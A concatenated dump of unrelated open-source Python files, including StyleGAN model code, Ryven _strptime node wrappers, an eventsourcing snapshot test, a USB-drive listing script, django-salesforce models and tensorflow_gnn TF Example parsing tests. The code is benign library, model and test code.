x = self.leaky(self.conv1(x))
x = self.leaky(self.conv2(x))
return x
class Generator(nn.Module):
def __init__(self, z_dim, w_dim, in_channels, img_channels=3):
super(Generator, self).__init__()
self.starting_constant = nn.Parameter(torch.ones((1, in_channels, 4, 4)))
self.map = MappingNetwork(z_dim, w_dim)
self.initial_adain1 = AdaIN(in_channels, w_dim)
self.initial_adain2 = AdaIN(in_channels, w_dim)
self.initial_noise1 = InjectNoise(in_channels)
self.initial_noise2 = InjectNoise(in_channels)
self.initial_conv = nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1)
self.leaky = nn.LeakyReLU(0.2, inplace=True)
self.initial_rgb = WSConv2d(
in_channels, img_channels, kernel_size=1, stride=1, padding=0
)
self.prog_blocks, self.rgb_layers = (
nn.ModuleList([]),
nn.ModuleList([self.initial_rgb]),
)
for i in range(len(factors) - 1): # -1 to prevent index error because of factors[i+1]
conv_in_c = int(in_channels * factors[i])
conv_out_c = int(in_channels * factors[i + 1])
self.prog_blocks.append(GenBlock(conv_in_c, conv_out_c, w_dim))
self.rgb_layers.append(
WSConv2d(conv_out_c, img_channels, kernel_size=1, stride=1, padding=0)
)
def fade_in(self, alpha, upscaled, generated):
# alpha should be scalar within [0, 1], and upscale.shape == generated.shape
return torch.tanh(alpha * generated + (1 - alpha) * upscaled)
def forward(self, noise, alpha, steps):
w = self.map(noise)
x = self.initial_adain1(self.initial_noise1(self.starting_constant), w)
x = self.initial_conv(x)
out = self.initial_adain2(self.leaky(self.initial_noise2(x)), w)
if steps == 0:
return self.initial_rgb(x)
for step in range(steps):
upscaled = F.interpolate(out, scale_factor=2, mode="bilinear")
out = self.prog_blocks[step](upscaled, w)
        # The number of channels in upscaled will stay the same, while
# out which has moved through prog_blocks might change. To ensure
# we can convert both to rgb we use different rgb_layers
# (steps-1) and steps for upscaled, out respectively
final_upscaled = self.rgb_layers[steps - 1](upscaled)
final_out = self.rgb_layers[steps](out)
return self.fade_in(alpha, final_upscaled, final_out)
class Discriminator(nn.Module):
def __init__(self, in_channels, img_channels=3):
super(Discriminator, self).__init__()
self.prog_blocks, self.rgb_layers = nn.ModuleList([]), nn.ModuleList([])
self.leaky = nn.LeakyReLU(0.2)
        # here we work backwards from factors because the discriminator
# should be mirrored from the generator. So the first prog_block and
# rgb layer we append will work for input size 1024x1024, then 512->256-> etc
for i in range(len(factors) - 1, 0, -1):
conv_in = int(in_channels * factors[i])
conv_out = int(in_channels * factors[i - 1])
self.prog_blocks.append(ConvBlock(conv_in, conv_out))
self.rgb_layers.append(
WSConv2d(img_channels, conv_in, kernel_size=1, stride=1, padding=0)
)
# perhaps confusing name "initial_rgb" this is just the RGB layer for 4x4 input size
# did this to "mirror" the generator initial_rgb
self.initial_rgb = WSConv2d(
img_channels, in_channels, kernel_size=1, stride=1, padding=0
)
self.rgb_layers.append(self.initial_rgb)
self.avg_pool = nn.AvgPool2d(
kernel_size=2, stride=2
) # down sampling using avg pool
# this is the block for 4x4 input size
self.final_block = nn.Sequential(
# +1 to in_channels because we concatenate from MiniBatch std
WSConv2d(in_channels + 1, in_channels, kernel_size=3, padding=1),
nn.LeakyReLU(0.2),
WSConv2d(in_channels, in_channels, kernel_size=4, padding=0, stride=1),
nn.LeakyReLU(0.2),
WSConv2d(
in_channels, 1, kernel_size=1, padding=0, stride=1
), # we use this instead of linear layer
)
def fade_in(self, alpha, downscaled, out):
"""Used to fade in downscaled using avg pooling and output from CNN"""
        # alpha should be a scalar within [0, 1], and downscaled.shape == out.shape
return alpha * out + (1 - alpha) * downscaled
def minibatch_std(self, x):
batch_statistics = (
torch.std(x, dim=0).mean().repeat(x.shape[0], 1, x.shape[2], x.shape[3])
)
# we take the std for each example (across all channels, and pixels) then we repeat it
# for a single channel and concatenate it with the image. In this way the discriminator
# will get information about the variation in the batch/image
return torch.cat([x, batch_statistics], dim=1)
def forward(self, x, alpha, steps):
# where we should start in the list of prog_blocks, maybe a bit confusing but
        # the last is for the 4x4. For example, if steps=1, then we should start
# at the second to last because input_size will be 8x8. If steps==0 we just
# use the final block
cur_step = len(self.prog_blocks) - steps
# convert from rgb as initial step, this will depend on
        # the image size (each will have its own rgb layer)
out = self.leaky(self.rgb_layers[cur_step](x))
if steps == 0: # i.e, image is 4x4
out = self.minibatch_std(out)
return self.final_block(out).view(out.shape[0], -1)
# because prog_blocks might change the channels, for down scale we use rgb_layer
# from previous/smaller size which in our case correlates to +1 in the indexing
downscaled = self.leaky(self.rgb_layers[cur_step + 1](self.avg_pool(x)))
out = self.avg_pool(self.prog_blocks[cur_step](out))
# the fade_in is done first between the downscaled and the input
# this is opposite from the generator
out = self.fade_in(alpha, downscaled, out)
for step in range(cur_step + 1, len(self.prog_blocks)):
out = self.prog_blocks[step](out)
out = self.avg_pool(out)
out = self.minibatch_std(out)
return self.final_block(out).view(out.shape[0], -1)
if __name__ == "__main__":
Z_DIM = 512
W_DIM = 512
IN_CHANNELS = 512
gen = Generator(Z_DIM, W_DIM, IN_CHANNELS, img_channels=3).to("cuda")
disc = Discriminator(IN_CHANNELS, img_channels=3).to("cuda")
tot = 0
for param in gen.parameters():
tot += param.numel()
print(tot)
import sys
sys.exit()
for img_size in [4, 8, 16, 32, 64, 128, 256, 512, 1024]:
num_steps = int(log2(img_size / 4))
x = torch.randn((2, Z_DIM)).to("cuda")
z = gen(x, 0.5, steps=num_steps)
assert z.shape == (2, 3, img_size, img_size)
out = disc(z, alpha=0.5, steps=num_steps)
assert out.shape == (2, 1)
print(f"Success! At img size: {img_size}")
|
Ryven/packages/auto_generated/_strptime/nodes.py | tfroehlich82/Ryven | 2,872 | 12717110 | <reponame>tfroehlich82/Ryven<filename>Ryven/packages/auto_generated/_strptime/nodes.py
from NENV import *
import _strptime
class NodeBase(Node):
pass
class _Calc_Julian_From_U_Or_W_Node(NodeBase):
"""
Calculate the Julian day based on the year, week of the year, and day of
the week, with week_start_day representing whether the week of the year
assumes the week starts on Sunday or Monday (6 or 0)."""
title = '_calc_julian_from_U_or_W'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='year'),
NodeInputBP(label='week_of_year'),
NodeInputBP(label='day_of_week'),
NodeInputBP(label='week_starts_Mon'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._calc_julian_from_U_or_W(self.input(0), self.input(1), self.input(2), self.input(3)))
class _Calc_Julian_From_V_Node(NodeBase):
"""
Calculate the Julian day based on the ISO 8601 year, week, and weekday.
ISO weeks start on Mondays, with week 01 being the week containing 4 Jan.
ISO week days range from 1 (Monday) to 7 (Sunday).
"""
title = '_calc_julian_from_V'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='iso_year'),
NodeInputBP(label='iso_week'),
NodeInputBP(label='iso_weekday'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._calc_julian_from_V(self.input(0), self.input(1), self.input(2)))
class _Getlang_Node(NodeBase):
"""
"""
title = '_getlang'
type_ = '_strptime'
init_inputs = [
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._getlang())
class _Strptime_Node(NodeBase):
"""
Return a 2-tuple consisting of a time struct and an int containing
the number of microseconds based on the input string and the
format string."""
title = '_strptime'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='data_string'),
NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime(self.input(0), self.input(1)))
class _Strptime_Datetime_Node(NodeBase):
"""
Return a class cls instance based on the input string and the
format string."""
title = '_strptime_datetime'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='cls'),
NodeInputBP(label='data_string'),
NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime_datetime(self.input(0), self.input(1), self.input(2)))
class _Strptime_Time_Node(NodeBase):
"""
Return a time struct based on the input string and the
format string."""
title = '_strptime_time'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='data_string'),
NodeInputBP(label='format', dtype=dtypes.Data(default='%a %b %d %H:%M:%S %Y', size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime._strptime_time(self.input(0), self.input(1)))
class Re_Compile_Node(NodeBase):
"""
Compile a regular expression pattern, returning a Pattern object."""
title = 're_compile'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='pattern'),
NodeInputBP(label='flags', dtype=dtypes.Data(default=0, size='s')),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime.re_compile(self.input(0), self.input(1)))
class Re_Escape_Node(NodeBase):
"""
Escape special characters in a string.
"""
title = 're_escape'
type_ = '_strptime'
init_inputs = [
NodeInputBP(label='pattern'),
]
init_outputs = [
NodeOutputBP(type_='data'),
]
color = '#32DA22'
def update_event(self, inp=-1):
self.set_output_val(0, _strptime.re_escape(self.input(0)))
export_nodes(
_Calc_Julian_From_U_Or_W_Node,
_Calc_Julian_From_V_Node,
_Getlang_Node,
_Strptime_Node,
_Strptime_Datetime_Node,
_Strptime_Time_Node,
Re_Compile_Node,
Re_Escape_Node,
)
|
eventsourcing/examples/aggregate8/test_snapshotting_intervals.py | ParikhKadam/eventsourcing | 107 | 12717120 | from unittest import TestCase
from eventsourcing.examples.aggregate8.application import DogSchool
from eventsourcing.examples.aggregate8.domainmodel import Dog
class SubDogSchool(DogSchool):
snapshotting_intervals = {Dog: 1}
class TestDogSchool(TestCase):
def test_dog_school(self) -> None:
# Construct application object.
school = SubDogSchool()
# Evolve application state.
dog_id = school.register_dog("Fido")
assert school.snapshots is not None
self.assertEqual(1, len(list(school.snapshots.get(dog_id))))
school.add_trick(dog_id, "roll over")
self.assertEqual(2, len(list(school.snapshots.get(dog_id))))
school.add_trick(dog_id, "play dead")
self.assertEqual(3, len(list(school.snapshots.get(dog_id))))
# Query application state.
dog = school.get_dog(dog_id)
assert dog["name"] == "Fido"
assert dog["tricks"] == ("roll over", "play dead")
|
winapi__windows__ctypes/winapi__get_usb_list.py | DazEB2/SimplePyScripts | 117 | 12717197 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
def locate_usb() -> list:
import win32file
from winapi__get_logical_drives import get_logical_drives
usb_list = list()
for drive_name in get_logical_drives():
drive_type = win32file.GetDriveType(drive_name)
if drive_type == win32file.DRIVE_REMOVABLE:
usb_list.append(drive_name)
return usb_list
if __name__ == '__main__':
print(locate_usb())
|
torchlambda/_version.py | medric49/torchlambda | 104 | 12717242 | __version__ = "NON-CI"
|
tests/test_migrate/models.py | agilentia/django-salesforce | 251 | 12717246 | <gh_stars>100-1000
"""Backward compatible behaviour with primary key 'Id' and upper-case field names"""
from salesforce import models
from salesforce.models import SalesforceModel
class User(SalesforceModel):
username = models.CharField(max_length=80)
email = models.CharField(max_length=100)
last_name = models.CharField(max_length=80)
first_name = models.CharField(max_length=40, null=True, blank=True)
is_active = models.BooleanField(default=False)
class Lead(SalesforceModel):
company = models.CharField(max_length=255)
last_name = models.CharField(max_length=80)
class Meta:
db_table = 'Lead'
class Contact(SalesforceModel):
last_name = models.CharField(max_length=80)
owner = models.ForeignKey(User, on_delete=models.DO_NOTHING, default=models.DefaultedOnCreate(User))
class Meta:
managed = True
db_table = 'Contact'
|
tests/__main__.py | otherJL0/Preql | 522 | 12717247 | <gh_stars>100-1000
import sys
import unittest
import logging
logging.basicConfig(level=logging.INFO)
from .test_basic import *
from .test_autocomplete import AutocompleteTests
minimal = [
AutocompleteTests,
TestTypes,
TestFlow,
TestFunctions,
BasicTests_0_Normal_Lt,
]
TESTS_SUITES = {
'minimal': minimal
}
def run_test_suite(suit):
tests = TESTS_SUITES[suit]
suite = unittest.TestSuite()
for t in tests:
suite.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(t))
unittest.TextTestRunner().run(suite)
if __name__ == '__main__':
try:
tests = run_test_suite(sys.argv[1])
except LookupError:
unittest.main() |
tensorflow_gnn/graph/graph_tensor_io_test.py | mattdangerw/gnn | 611 | 12717248 | """Tests for gt.GraphTensor extension type (go/tf-gnn-api)."""
import functools
from typing import Any, Callable, Iterable, List, Mapping, Optional
from absl.testing import parameterized
import google.protobuf.text_format as pbtext
import tensorflow as tf
from tensorflow_gnn.graph import adjacency as adj
from tensorflow_gnn.graph import graph_constants as gc
from tensorflow_gnn.graph import graph_tensor as gt
from tensorflow_gnn.graph import graph_tensor_io as io
from tensorflow_gnn.graph import schema_utils as su
import tensorflow_gnn.proto.graph_schema_pb2 as schema_pb2
ResultValue = Mapping[str, Any]
ResultFn = Callable[[gt.GraphTensor], ResultValue]
as_tensor = tf.convert_to_tensor
as_ragged = tf.ragged.constant
class TfExampleParsingTestBase(tf.test.TestCase, parameterized.TestCase):
def pbtxt_to_dataset(self, examples_pbtxt: List[str]) -> tf.data.Dataset:
serialized = []
for example_pbtxt in examples_pbtxt:
serialized.append(
pbtext.Merge(example_pbtxt, tf.train.Example()).SerializeToString())
return tf.data.Dataset.from_tensor_slices(serialized)
def assertFieldsEqual(self, expected: gt.Fields, actual: gt.Fields):
    self.assertAllEqual(expected.keys(), actual.keys())
for k in expected.keys():
self.assertAllEqual(expected[k], actual[k], msg=f'field={k}')
def assertFieldsSeqEqual(self, expected: Iterable[gt.Fields],
actual: Iterable[gt.Fields]):
expected = list(expected)
actual = list(actual)
self.assertEqual(len(expected), len(actual))
for e, a in zip(expected, actual):
self.assertFieldsEqual(e, a)
class TfExampleParsingFromSpecTest(TfExampleParsingTestBase):
"""Tests for TF Example to Graph Tensor parsing from the GraphTensorSpec."""
@parameterized.parameters([
dict(
description='context dense features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'v': tf.TensorSpec(shape=(2,), dtype=tf.int16),
'm': tf.TensorSpec(shape=(2, 3), dtype=tf.int32),
't': tf.TensorSpec(shape=(1, 1, 2), dtype=tf.int64),
})),
examples=[
r"""
features {
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
}"""
],
expected_values=[{
'context/v': as_tensor([1, 2]),
'context/m': as_tensor([[1, 2, 3], [4, 5, 6]]),
'context/t': as_tensor([[[1, 2]]])
}, {
'context/v': as_tensor([9, 8]),
'context/m': as_tensor([[9, 8, 7], [6, 5, 4]]),
'context/t': as_tensor([[[9, 8]]])
}]),
dict(
description='context ragged features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'xyz':
tf.RaggedTensorSpec(
shape=(None, None, 3),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.float32)
})),
examples=[
r"""
features {
feature {
key: "context/xyz"
value {
float_list {value: [-1., 0., 1., 1., 0., -1., 2., 2., 2.]}
}
}
feature {
key: "context/xyz.d1"
value {
int64_list {value: [0, 2, 0, 1]}
}
}
}"""
],
expected_values=[{
'context/xyz':
as_ragged([[], [[-1., 0., 1.], [1., 0., -1.]], [],
[[2., 2., 2.]]],
ragged_rank=1)
}]),
dict(
description='node/edge features parsing',
spec=gt.GraphTensorSpec.from_piece_specs(
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'text':
tf.RaggedTensorSpec(
shape=(None, None, None),
ragged_rank=2,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={
'weight':
tf.TensorSpec(
shape=(None,), dtype=tf.float32),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32),
adjacency_spec=(
adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)))),
}),
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1, 2]} } }
feature {key: "nodes/node.text" value {bytes_list {value: ['a', 'b', 'c', 'd', 'e']} } }
feature {key: "nodes/node.text.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "nodes/node.text.d2" value {int64_list {value: [2, 1, 2]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [2, 3]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}"""
],
expected_values=[{
'node/#size': [1, 2],
'node/text':
as_ragged([[[b'a', b'b'], [b'c']], [], [[b'd', b'e']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size':
as_tensor([2, 3]),
'edge/#source':
as_tensor([0, 1, 2, 2, 2]),
'edge/#target':
as_tensor([2, 1, 0, 0, 0]),
'edge/weight':
as_tensor([1., 2., 3., 4., 5.])
}])
])
def testSingleExampleParsing(
self,
description: str,
spec: gt.GraphTensorSpec,
examples: List[str],
expected_values: List[gc.Fields],
):
ds = self.pbtxt_to_dataset(examples)
ds = ds.map(functools.partial(io.parse_single_example, spec))
self.assertAllEqual(ds.element_spec, spec)
ds = ds.map(_flatten_homogeneous_graph)
self.assertFieldsSeqEqual(expected_values, ds)
case1 = dict(
description='context dense features parsing',
drop_remainder=True,
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(features_spec={
'v': tf.TensorSpec(shape=(2,), dtype=tf.int16),
'm': tf.TensorSpec(shape=(2, 3), dtype=tf.int32),
't': tf.TensorSpec(shape=(1, 1, 2), dtype=tf.int64),
})),
examples=[
r"""
features {
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
}"""
],
expected={
'context/v': as_tensor([[1, 2], [9, 8]]),
'context/m': as_tensor([[[1, 2, 3], [4, 5, 6]],
[[9, 8, 7], [6, 5, 4]]]),
'context/t': as_tensor([[[[1, 2]]], [[[9, 8]]]])
},
prefix=None,
validate=True)
case2 = dict(
description='ragged features parsing',
drop_remainder=False,
spec=gt.GraphTensorSpec.from_piece_specs(
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'words':
tf.RaggedTensorSpec(
shape=(None, None),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(shape=(1,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={
'weight':
tf.TensorSpec(
shape=(None,), dtype=tf.float32),
},
sizes_spec=tf.TensorSpec(shape=(1,), dtype=tf.int32),
adjacency_spec=(
adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)))),
}),
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [3]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [5]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}""", r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['e', 'f']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2]} } }
}"""
],
expected={
'node/#size': as_tensor([[3], [1]]),
'node/words': as_ragged([[[b'a', b'b'], [], [b'c']], [[b'e', b'f']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size': as_tensor([[5], [0]]),
'edge/#source': as_ragged([[0, 1, 2, 2, 2], []]),
'edge/#target': as_ragged([[2, 1, 0, 0, 0], []]),
'edge/weight': as_ragged([[1., 2., 3., 4., 5.], []])
},
prefix=None,
validate=True)
# pylint: disable=g-long-lambda
case3 = dict(
description='variable number of graph components',
drop_remainder=False,
spec=gt.GraphTensorSpec.from_piece_specs(
context_spec=gt.ContextSpec.from_field_specs(
features_spec={
'label': tf.TensorSpec(shape=(None,), dtype=tf.string)}),
node_sets_spec={
'node':
gt.NodeSetSpec.from_field_specs(
features_spec={
'words': tf.RaggedTensorSpec(
shape=(None, None),
ragged_rank=1,
row_splits_dtype=tf.int32,
dtype=tf.string),
},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32)),
},
edge_sets_spec={
'edge':
gt.EdgeSetSpec.from_field_specs(
features_spec={'weight': tf.TensorSpec(
shape=(None,), dtype=tf.float32)},
sizes_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32),
adjacency_spec=adj.AdjacencySpec.from_incident_node_sets(
source_node_set='node',
target_node_set='node',
index_spec=tf.TensorSpec(
shape=(None,), dtype=tf.int32))),
}),
examples=[
r"""
features {
feature {key: "context/label" value {bytes_list {value: ['G', 'B']} } }
feature {key: "nodes/node.#size" value {int64_list {value: [1, 2]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2, 0, 1]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [2, 3]} } }
feature {key: "edges/edge.#source" value {int64_list {value: [0, 1, 2, 2, 2]} } }
feature {key: "edges/edge.#target" value {int64_list {value: [2, 1, 0, 0, 0]} } }
feature {key: "edges/edge.weight" value {float_list {value: [1., 2., 3., 4., 5.]} } }
}""", r"""
features {
feature {key: "context/label" value {bytes_list {value: ['B']} } }
feature {key: "nodes/node.#size" value {int64_list {value: [1]} } }
feature {key: "nodes/node.words" value {bytes_list {value: ['e', 'f']} } }
feature {key: "nodes/node.words.d1" value {int64_list {value: [2]} } }
feature {key: "edges/edge.#size" value {int64_list {value: [0]} } }
}"""
],
expected={
'context/label': as_ragged([[b'G', b'B'], [b'B']]),
'node/#size': as_ragged([[1, 2], [1]]),
'node/words': as_ragged([[[b'a', b'b'], [], [b'c']], [[b'e', b'f']]],
ragged_rank=2,
dtype=tf.string,
row_splits_dtype=tf.int32),
'edge/#size': as_ragged([[2, 3], [0]]),
'edge/#source': as_ragged([[0, 1, 2, 2, 2], []]),
'edge/#target': as_ragged([[2, 1, 0, 0, 0], []]),
'edge/weight': as_ragged([[1., 2., 3., 4., 5.], []])
},
prefix=None,
validate=True)
case4 = case3.copy()
case4['prefix'] = 'gnn_'
case4['validate'] = False
@parameterized.parameters([case1, case2, case3])
def testExamplesParsing(
self,
description: str,
spec: gt.GraphTensorSpec,
drop_remainder: bool,
examples: List[str],
expected: gc.Fields,
prefix: Optional[str],
validate: bool,
):
batch_size = len(examples)
ds = self.pbtxt_to_dataset(examples)
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(functools.partial(io.parse_example, spec,
prefix=prefix, validate=validate))
self.assertAllEqual(ds.element_spec,
spec._batch(batch_size if drop_remainder else None))
ds = ds.map(_flatten_homogeneous_graph)
self.assertFieldsSeqEqual([expected], ds)
class TfExampleParsingFromSchemaTest(TfExampleParsingTestBase):
"""Tests for TF Example to Graph Tensor parsing from the GraphSchema."""
def _test_impl(self, schema_pb: schema_pb2.GraphSchema, examples: List[str],
expected_value: ResultValue, result_map_fn: ResultFn, *,
batch_then_parse: bool, drop_remainder: bool):
assert isinstance(schema_pb, schema_pb2.GraphSchema)
graph_spec = su.create_graph_spec_from_schema_pb(schema_pb)
batch_size = len(examples)
ds = self.pbtxt_to_dataset(examples)
if batch_then_parse:
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(functools.partial(io.parse_example, graph_spec))
else:
ds = ds.map(functools.partial(io.parse_single_example, graph_spec))
ds = ds.batch(batch_size, drop_remainder=drop_remainder)
ds = ds.map(result_map_fn)
result_value = next(iter(ds))
self.assertFieldsEqual(result_value, expected_value)
def _test_all_cases(self, schema_pb: schema_pb2.GraphSchema,
examples: List[str], expected_value: ResultValue,
result_map_fn):
test_case = functools.partial(self._test_impl, schema_pb, examples,
expected_value, result_map_fn)
test_case(batch_then_parse=True, drop_remainder=True)
test_case(batch_then_parse=True, drop_remainder=False)
test_case(batch_then_parse=False, drop_remainder=True)
test_case(batch_then_parse=False, drop_remainder=False)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
context {
features {
key: "s"
value: {
dtype: DT_INT16
}
}
features {
key: "v"
value: {
dtype: DT_INT32
shape: { dim { size: 2 } }
}
}
features {
key: "m"
value: {
dtype: DT_INT32
shape: { dim { size: 2 }, dim { size: 3 } }
}
}
features {
key: "t"
value: {
dtype: DT_INT64
shape: { dim { size: 1 }, dim { size: 1 }, dim { size: 2 } }
}
}
features {
key: "r"
value: {
dtype: DT_UINT32
shape: { dim { size: -1 } dim { size: -1 } }
}
}
}""",
examples=[
r"""
features {
feature {key: "context/s" value {int64_list {value: [1]} } }
feature {key: "context/v" value {int64_list {value: [1, 2]} } }
feature {key: "context/m" value {int64_list {value: [1, 2, 3, 4, 5, 6]} } }
feature {key: "context/t" value {int64_list {value: [1, 2] } } }
feature {key: "context/r" value {int64_list {value: [1, 2, 3] } } }
feature {key: "context/r.d1" value {int64_list {value: [2] } } }
feature {key: "context/r.d2" value {int64_list {value: [1, 2] } } }
}""", r"""
features {
feature {key: "context/s" value {int64_list {value: [9]} } }
feature {key: "context/v" value {int64_list {value: [9, 8]} } }
feature {key: "context/m" value {int64_list {value: [9, 8, 7, 6, 5, 4]} } }
feature {key: "context/t" value {int64_list {value: [9, 8]} } }
feature {key: "context/r.d1" value {int64_list {value: [0] } } }
}"""
],
expected_value={
's':
as_tensor([[1], [9]]),
'v':
as_tensor([[[1, 2]], [[9, 8]]]),
'm':
as_tensor([[[[1, 2, 3], [4, 5, 6]]], [[[9, 8, 7], [6, 5,
4]]]]),
't':
as_tensor([[[[[1, 2]]]], [[[[9, 8]]]]]),
'r':
as_ragged([[[[1], [2, 3]]], [[]]],
ragged_rank=3,
row_splits_dtype=tf.int32)
})
])
def testContextParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
return g.context.get_features_dict()
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
node_sets {
key: "node"
value {
features {
key: "id"
value { dtype: DT_STRING }
}
}
value {
features {
key: "fv"
value {
dtype: DT_FLOAT
shape: { dim { size: 3 } }
}
}
}
value {
features {
key: "sr"
value {
dtype: DT_STRING
shape: { dim { size: -1 } }
}
}
}
}
""",
examples=[
r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [1] } } }
feature {key: "nodes/node.id" value {bytes_list {value: ['node.1.1'] } } }
feature {key: "nodes/node.fv" value {float_list {value: [1., 2., 3.] } } }
feature {key: "nodes/node.sr.d1" value {int64_list {value: [0]} } }
}""", r"""
features {
}""", r"""
features {
feature {key: "nodes/node.#size" value {int64_list {value: [2] } } }
feature {key: "nodes/node.id" value {bytes_list {value: ['node.3.1', 'node.3.2'] } } }
feature {key: "nodes/node.fv" value {float_list {value: [4., 5., 6., 7., 8., 9.] } } }
feature {key: "nodes/node.sr" value {bytes_list {value: ['a', 'b', 'c']} } }
feature {key: "nodes/node.sr.d1" value {int64_list {value: [1, 2]} } }
}"""
],
expected_value={
'id':
as_ragged([['node.1.1'], [], ['node.3.1', 'node.3.2']]),
'fv':
as_ragged([[[1., 2., 3.]], [], [[4., 5., 6.], [7., 8., 9.]]],
ragged_rank=1,
row_splits_dtype=tf.int32),
'sr':
as_ragged([[[]], [], [['a'], ['b', 'c']]],
ragged_rank=2,
row_splits_dtype=tf.int32),
'#size':
as_tensor([[1], [0], [2]]),
})
])
def testNodeSetParsing(self, description: str, schema_pbtxt: str,
examples: List[str], expected_value: ResultValue):
schema_pb = pbtext.Merge(schema_pbtxt, schema_pb2.GraphSchema())
@tf.function
def result_map_fn(g: gt.GraphTensor):
node = g.node_sets['node']
features = node.get_features_dict()
features.update({'#size': node.sizes})
return features
self._test_all_cases(schema_pb, examples, expected_value, result_map_fn)
@parameterized.parameters([
dict(
description='context dense features parsing',
schema_pbtxt=r"""
edge_sets {
key: "edge"
value {
features {
key: "id"
value { dtype: DT_STRING }
}
